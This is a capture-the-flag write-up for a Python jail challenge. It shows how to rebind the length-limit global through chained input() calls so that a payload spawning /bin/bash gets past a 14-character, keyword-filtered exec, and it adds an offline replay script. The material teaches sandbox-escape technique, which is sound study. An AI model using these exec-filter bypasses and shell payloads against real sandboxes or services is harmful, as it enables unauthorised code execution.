🚩 Filter'd
Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
Challenge Statement
#!/usr/local/bin/python3
M = 14 # no malicious code could ever be executed since this limit is so low, right?
def f(code):
    assert len(code) <= M
    assert all(ord(c) < 128 for c in code)
    assert all(q not in code for q in ["exec", "eval", "breakpoint", "help", "license", "exit", "quit"])
    exec(code, globals())
f(input("> "))
🚩 Getting the Flag
When we arrive at this jail challenge, here's what we absolutely need to consider:
- We cannot use the substrings exec, eval, breakpoint, help, license, exit, quit anywhere in the payload. The check is q not in code, so it also rejects longer names that contain one of them.
- We cannot use non-ASCII characters.
- Our payload must be <= 14 characters.
- We are executing code with an exec in the globals() scope, so every name we assign becomes a module global, and the jail's own globals (the function f and the limit M) are reachable from our code.
Everything is perfect! I can see how to approach this. The limit M is just a global, and the length check reads it fresh on every call to f, so if we rebind M from inside the jail, the next call to f will accept a longer payload. Each step reads the next line of stdin with input() and hands it straight back to f, and a=input();f(a) is exactly 14 characters. The third line sets M=1000 and then re-runs a, which still holds b=input();f(b): that reads a fourth line into b and calls f on it with the raised limit, so a payload far longer than 14 characters is accepted.
> a=input();f(a)
b=input();f(b)
M=1000;f(a)
__import__('os').system('/bin/bash')
ls -la
total 16
drwxr-xr-x 1 nobody nogroup 4096 Jul 1 04:46 .
drwxr-xr-x 1 nobody nogroup 4096 Jul 1 04:46 ..
-r--r--r-- 1 nobody nogroup 46 Jul 1 04:39 flag.txt
-rwxr-xr-x 1 nobody nogroup 342 Jul 1 04:45 run
cat flag.txt
jail{can_you_repeat_that_for_me?_aacb7144d2c}
Thanks Exec ❤️
Fortunately, the jail runs our code with exec(code, globals()), so every assignment we make (a, b, and M itself) lands in the module's globals and survives into the next call to f. Without that, we could neither store the next line nor overwrite M, and we wouldn't have been able to get the flag.
And there you go, we have the flag. It's as simple as that.
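To step through the chain offline, here is an added example that is not the challenge's run script. The function f is copied from the challenge with one bookkeeping line added, input() is replaced by a scripted stdin so no remote is needed, and the last line of the chain stores os.name instead of spawning /bin/bash (the names _stdin, _accepted, passes_filter, run_chain and pwned are this example's own).

```python
"""Offline replay of the Filter'd chain (added example, not the challenge's own code)."""

M = 14  # the challenge's limit; it is a module global, so exec'd code can rebind it

BLOCKLIST = ["exec", "eval", "breakpoint", "help", "license", "exit", "quit"]

# Scripted stdin. exec(code, globals()) resolves the name `input` in this
# module's globals before builtins, so the jailed code reads from this list.
_stdin = []


def input(prompt=""):
    return _stdin.pop(0)


_accepted = []  # payloads that got past the three assertions, in call order


def f(code):
    # The challenge's checks, verbatim. Note that M is read on every call.
    assert len(code) <= M
    assert all(ord(c) < 128 for c in code)
    assert all(q not in code for q in BLOCKLIST)
    _accepted.append(code)  # added for bookkeeping only
    exec(code, globals())


def passes_filter(code, limit=14):
    """Replicates the three checks without executing anything, so a payload
    can be sized against whatever limit is in force at that step."""
    return (len(code) <= limit
            and all(ord(c) < 128 for c in code)
            and all(q not in code for q in BLOCKLIST))


# The chain from the session above. The first two lines are exactly 14
# characters; the last one is a constructed 27-character stand-in for the
# shell payload and is only accepted because M has been raised by then.
CHAIN = [
    "a=input();f(a)",               # a <- line 2, then f(a)
    "b=input();f(b)",               # b <- line 3, then f(b)
    "M=1000;f(a)",                  # lift the limit, re-run a: b <- line 4, f(b)
    "pwned=__import__('os').name",  # 27 chars, would fail the length check at M=14
]


def run_chain(lines):
    """Drive the jail the way the challenge does, f(input('> ')), with `lines`
    as stdin. Returns (accepted payload lengths in order, value stored by the
    final payload)."""
    global M, _stdin, pwned
    M = 14
    pwned = None
    _stdin = list(lines)
    _accepted.clear()
    f(input("> "))
    return [len(c) for c in _accepted], pwned


if __name__ == "__main__":
    lengths, result = run_chain(CHAIN)
    print("accepted payload lengths:", lengths)  # [14, 14, 11, 14, 27]
    print("value set by the final payload:", result)
```

The accepted-length trace makes the mechanism visible: the fourth entry is a, run a second time after M was raised, and only then does the 27-character payload get through. passes_filter is useful while building a chain, since every step except the last has to fit in 14 characters and avoid the blocklist.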